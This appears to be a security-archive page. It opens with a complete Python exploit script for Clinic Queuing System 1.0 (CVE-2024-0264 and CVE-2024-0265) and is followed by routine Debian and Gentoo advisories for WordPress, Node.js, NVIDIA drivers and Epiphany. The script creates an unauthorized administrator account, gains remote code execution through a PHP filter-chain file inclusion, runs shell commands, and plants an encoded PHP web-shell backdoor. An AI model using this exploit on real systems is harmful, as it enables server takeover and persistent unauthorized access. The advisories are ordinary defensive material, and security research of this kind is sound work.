    # Exploit Title: Clinic Queuing System 1.0 RCE # Date: 2024/1/7# Exploit Author: Juan Marco Sanchez# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/php/16439/clinic-queuing-system-using-php-and-sqlite3-source-code-free-download.html# Version: 1.0# Tested on: Debian Linux Apache Web Server# CVE: CVE-2024-0264 and CVE-2024-0265import requestsimport randomimport argparsefrom bs4 import BeautifulSoupparser = argparse.ArgumentParser()parser.add_argument("target")args = parser.parse_args()base_url = args.targetphase1_url = base_url + '/LoginRegistration.php?a=save_user'phase2_url = base_url + '/LoginRegistration.php?a=login'filter_chain = "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.CP950.SHIFT_JISX0213|convert.iconv.UHC.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.BIG5HKSCS.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=home"def phase1(): # CVE-2024-0264  rand_user = 'pwn_'+str(random.randint(100, 313))  rand_pass = 'pwn_'+str(random.randint(100, 313))  pwn_user_data = {'formToken':'','fullname':'pwn!','username':rand_user,'password':rand_pass,'status':1,'type':1}  print("[*] adding administrator " + rand_user + ":" + rand_pass)  phase1 = requests.post(phase1_url, pwn_user_data)  if "User Account has been added successfully." in phase1.text:    print("[+] Phase 1 Success - Admin user added!\n")    print("[*] Initiating Phase 2")    phase2(rand_user, rand_pass)  else:    print("[X] user creation failed :(")    die()def phase2(user, password): # CVE-2024-0265  s = requests.Session();  login_data = {'formToken':'','username':user, 'password':password}  print("[*] Loggin in....")  phase2 = s.post(phase2_url, login_data)  if "Login successfully." in phase2.text:    print("[+] Login success")  else:    print("[X] Login failed.")    die()  print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")  rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"  #print("[*] Payload: " + rce_url)  rce = s.get(rce_url)    if "jmrcsnchz" in rce.text:    print("[+] RCE success!")    soup = BeautifulSoup(rce.text, 'html.parser')    print("[+] Output of id: " + soup.pre.get_text())    print("[*] Uploading php backdoor....")    s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")    print("[+] Access at " + base_url + "/rce.php?0=whoami")  else:    print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")    die()try:  print("[*] Initiating Phase 1")  phase1()except:  print("Exploit failed.")

Clinic Queuing System 1.0 Remote Code Execution

Debian Linux Security Advisory 5685-1 - Several security vulnerabilities have been discovered in Wordpress, a popular content management framework, which may lead to exposure of sensitive information to an unauthorized actor in WordPress or allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5685-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
May 08, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : wordpress  
CVE ID         : CVE-2023-2745 CVE-2023-5561 CVE-2023-38000 CVE-2023-39999  
                 CVE-2024-31210  
Debian Bug     : 1036296

Several security vulnerabilities have been discovered in Wordpress, a popular  
content management framework, which may lead to exposure of sensitive  
information to an unauthorized actor in WordPress or allowing unauthenticated  
attackers to discern the email addresses of users who have published public  
posts on an affected website via an Oracle style attack.

Furthermore this update resolves a possible cross-site-scripting vulnerability,  
a PHP File Upload bypass via the plugin installer and a possible remote code  
execution vulnerability which requires an attacker to control all the  
properties of a deserialized object though.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.7.11+dfsg1-0+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.6+dfsg1-0+deb12u1.

We recommend that you upgrade your wordpress packages.

For the detailed security status of wordpress please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/wordpress

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmY78XJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRBIBAAlHttuzHU3awlLA5WFHprj6S3PJA2YQSQjt+Ejk+pFGVpHjs4/gaI8S/t  
3rb9hEf2ClK6NdNxqAHSNzOuYLAG3S1rfATtQGfxEpYTBrngXKSUgFltElhRBACe  
GOLxtfh7Yha94hbf/HBiFEpKEmFXLnmGuSv1M0z77SEcNEdQ0sd5Be5VDwKcxnY6  
FYrrvoFjYUiDj66B19/B8ytUlRb7Mgr8KakqOiO6jzINL/mtJ52pcd63+JrkBF0L  
8br30YKxII9Rb10ygBhl5AzjhC/yrQexVtYyK0l1avm7/JC08kxDch++ANRekCJA  
kTx0ARi2AZJv1ktzm1DIfxNLrLtiCTJjSFFi6/WTCW3UAFNiVbEQOYal95lKBLXG  
V6AJhYYYPI3rbwnUJX5FZn4PEKoHTXotuveqdGHF2727ROUrConLZrrBa/hovj7v  
GPIe4SZZHLizK2CO84Gxgy7mI4F46I2C6TlIMvsJKyL1XUopti+Ds8f7e5AIgzB9  
rSkYPTBfLsm5fIeVpodja1qJMQdo9NklnamaPnbjL8BTmExedf638WYJfMLBqgXY  
Kl9M6uSwfBpl2dfvKqg2iUos359X65Nt+Cd3Ve5zsSigDssvsQ7YTV/TJHMavq6z  
f294k2zHfMaCiathCpOayN8KFX7WHeBEL8N8j/bukYgFaHD8y5o=qCem  
-----END PGP SIGNATURE-----

Debian Security Advisory 5685-1

Gentoo Linux Security Advisory 202405-29 - Multiple vulnerabilities have been discovered in Node.js. Versions greater than or equal to 16.20.2 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202405-29- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low    Title: Node.js: Multiple Vulnerabilities     Date: May 08, 2024     Bugs: #772422, #781704, #800986, #805053, #807775, #811273, #817938, #831037, #835615, #857111, #865627, #872692, #879617, #918086, #918614       ID: 202405-29- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis=======Multiple vulnerabilities have been discovered in Node.js.Background=========Node.js is a JavaScript runtime built on Chrome’s V8 JavaScript engine.Affected packages================Package          Vulnerable    Unaffected---------------  ------------  ------------net-libs/nodejs  < 16.20.2     >= 16.20.2Description==========Multiple vulnerabilities have been discovered in Node.js. Please reviewthe CVE identifiers referenced below for details.Impact=====Please review the referenced CVE identifiers for details.Workaround=========There is no known workaround at this time.Resolution=========All Node.js 20 users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/nodejs-20.5.1"All Node.js 18 users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/nodejs-18.17.1"All Node.js 16 users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/nodejs-16.20.2"References=========[ 1 ] CVE-2020-7774      https://nvd.nist.gov/vuln/detail/CVE-2020-7774[ 2 ] CVE-2021-3672      https://nvd.nist.gov/vuln/detail/CVE-2021-3672[ 3 ] CVE-2021-22883      https://nvd.nist.gov/vuln/detail/CVE-2021-22883[ 4 ] CVE-2021-22884      https://nvd.nist.gov/vuln/detail/CVE-2021-22884[ 5 ] CVE-2021-22918      https://nvd.nist.gov/vuln/detail/CVE-2021-22918[ 6 ] CVE-2021-22930      https://nvd.nist.gov/vuln/detail/CVE-2021-22930[ 7 ] CVE-2021-22931      https://nvd.nist.gov/vuln/detail/CVE-2021-22931[ 8 ] CVE-2021-22939      https://nvd.nist.gov/vuln/detail/CVE-2021-22939[ 9 ] CVE-2021-22940      https://nvd.nist.gov/vuln/detail/CVE-2021-22940[ 10 ] CVE-2021-22959      https://nvd.nist.gov/vuln/detail/CVE-2021-22959[ 11 ] CVE-2021-22960      https://nvd.nist.gov/vuln/detail/CVE-2021-22960[ 12 ] CVE-2021-37701      https://nvd.nist.gov/vuln/detail/CVE-2021-37701[ 13 ] CVE-2021-37712      https://nvd.nist.gov/vuln/detail/CVE-2021-37712[ 14 ] CVE-2021-39134      https://nvd.nist.gov/vuln/detail/CVE-2021-39134[ 15 ] CVE-2021-39135      https://nvd.nist.gov/vuln/detail/CVE-2021-39135[ 16 ] CVE-2021-44531      https://nvd.nist.gov/vuln/detail/CVE-2021-44531[ 17 ] CVE-2021-44532      https://nvd.nist.gov/vuln/detail/CVE-2021-44532[ 18 ] CVE-2021-44533      https://nvd.nist.gov/vuln/detail/CVE-2021-44533[ 19 ] CVE-2022-0778      https://nvd.nist.gov/vuln/detail/CVE-2022-0778[ 20 ] CVE-2022-3602      https://nvd.nist.gov/vuln/detail/CVE-2022-3602[ 21 ] CVE-2022-3786      https://nvd.nist.gov/vuln/detail/CVE-2022-3786[ 22 ] CVE-2022-21824      https://nvd.nist.gov/vuln/detail/CVE-2022-21824[ 23 ] CVE-2022-32212      https://nvd.nist.gov/vuln/detail/CVE-2022-32212[ 24 ] CVE-2022-32213      https://nvd.nist.gov/vuln/detail/CVE-2022-32213[ 25 ] CVE-2022-32214      https://nvd.nist.gov/vuln/detail/CVE-2022-32214[ 26 ] CVE-2022-32215      https://nvd.nist.gov/vuln/detail/CVE-2022-32215[ 27 ] CVE-2022-32222      https://nvd.nist.gov/vuln/detail/CVE-2022-32222[ 28 ] CVE-2022-35255      https://nvd.nist.gov/vuln/detail/CVE-2022-35255[ 29 ] CVE-2022-35256      https://nvd.nist.gov/vuln/detail/CVE-2022-35256[ 30 ] CVE-2022-35948      https://nvd.nist.gov/vuln/detail/CVE-2022-35948[ 31 ] CVE-2022-35949      https://nvd.nist.gov/vuln/detail/CVE-2022-35949[ 32 ] CVE-2022-43548      https://nvd.nist.gov/vuln/detail/CVE-2022-43548[ 33 ] CVE-2023-30581      https://nvd.nist.gov/vuln/detail/CVE-2023-30581[ 34 ] CVE-2023-30582      https://nvd.nist.gov/vuln/detail/CVE-2023-30582[ 35 ] CVE-2023-30583      https://nvd.nist.gov/vuln/detail/CVE-2023-30583[ 36 ] CVE-2023-30584      https://nvd.nist.gov/vuln/detail/CVE-2023-30584[ 37 ] CVE-2023-30586      https://nvd.nist.gov/vuln/detail/CVE-2023-30586[ 38 ] CVE-2023-30587      https://nvd.nist.gov/vuln/detail/CVE-2023-30587[ 39 ] CVE-2023-30588      https://nvd.nist.gov/vuln/detail/CVE-2023-30588[ 40 ] CVE-2023-30589      https://nvd.nist.gov/vuln/detail/CVE-2023-30589[ 41 ] CVE-2023-30590      https://nvd.nist.gov/vuln/detail/CVE-2023-30590[ 42 ] CVE-2023-32002      https://nvd.nist.gov/vuln/detail/CVE-2023-32002[ 43 ] CVE-2023-32003      https://nvd.nist.gov/vuln/detail/CVE-2023-32003[ 44 ] CVE-2023-32004      https://nvd.nist.gov/vuln/detail/CVE-2023-32004[ 45 ] CVE-2023-32005      https://nvd.nist.gov/vuln/detail/CVE-2023-32005[ 46 ] CVE-2023-32006      https://nvd.nist.gov/vuln/detail/CVE-2023-32006[ 47 ] CVE-2023-32558      https://nvd.nist.gov/vuln/detail/CVE-2023-32558[ 48 ] CVE-2023-32559      https://nvd.nist.gov/vuln/detail/CVE-2023-32559Availability===========This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202405-29Concerns?========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-29

Gentoo Linux Security Advisory 202405-28 - Multiple vulnerabilities have been discovered in NVIDIA Drivers, the worst of which could result in root privilege escalation. Versions greater than or equal to 470.223.02 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: NVIDIA Drivers: Multiple Vulnerabilities  
     Date: May 08, 2024  
     Bugs: #909226, #916583  
       ID: 202405-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in NVIDIA Drivers, the  
worst of which could result in root privilege escalation.

Background  
=========  
NVIDIA Drivers are NVIDIA's accelerated graphics driver.

Affected packages  
================  
Package                     Vulnerable    Unaffected  
--------------------------  ------------  -------------  
x11-drivers/nvidia-drivers  < 470.223.02  >= 470.223.02

Description  
==========  
Multiple vulnerabilities have been discovered in NVIDIA Drivers. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All NVIDIA Drivers 470 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-drivers/nvidia-drivers-470.223.02:0/470"

All NVIDIA Drivers 525 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-drivers/nvidia-drivers-525.147.05:0/525"

All NVIDIA Drivers 535 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-drivers/nvidia-drivers-535.129.03:0/535"

References  
=========  
[ 1 ] CVE-2023-25515  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25515  
[ 2 ] CVE-2023-25516  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25516  
[ 3 ] CVE-2023-31022  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31022

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-28

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-28

Gentoo Linux Security Advisory 202405-27 - A vulnerability has been discovered in Epiphany, which can lead to a buffer overflow. Versions greater than or equal to 42.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Epiphany: Buffer Overflow  
     Date: May 08, 2024  
     Bugs: #839786  
       ID: 202405-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in Epiphany, which can lead to a  
buffer overflow.

Background  
=========  
Epiphany is a GNOME webbrowser based on the Mozilla rendering engine  
Gecko.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
www-client/epiphany  < 42.4        >= 42.4

Description  
==========  
A vulnerability has been discovered in Epiphany. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
In GNOME Epiphany an HTML document can trigger a client buffer overflow  
(in ephy_string_shorten) via a long page title. The issue occurs because  
the number of bytes for a UTF-8 ellipsis character is not properly  
considered.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Epiphany users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/epiphany-42.4"

References  
=========  
[ 1 ] CVE-2022-29536  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29536

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-27

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#mac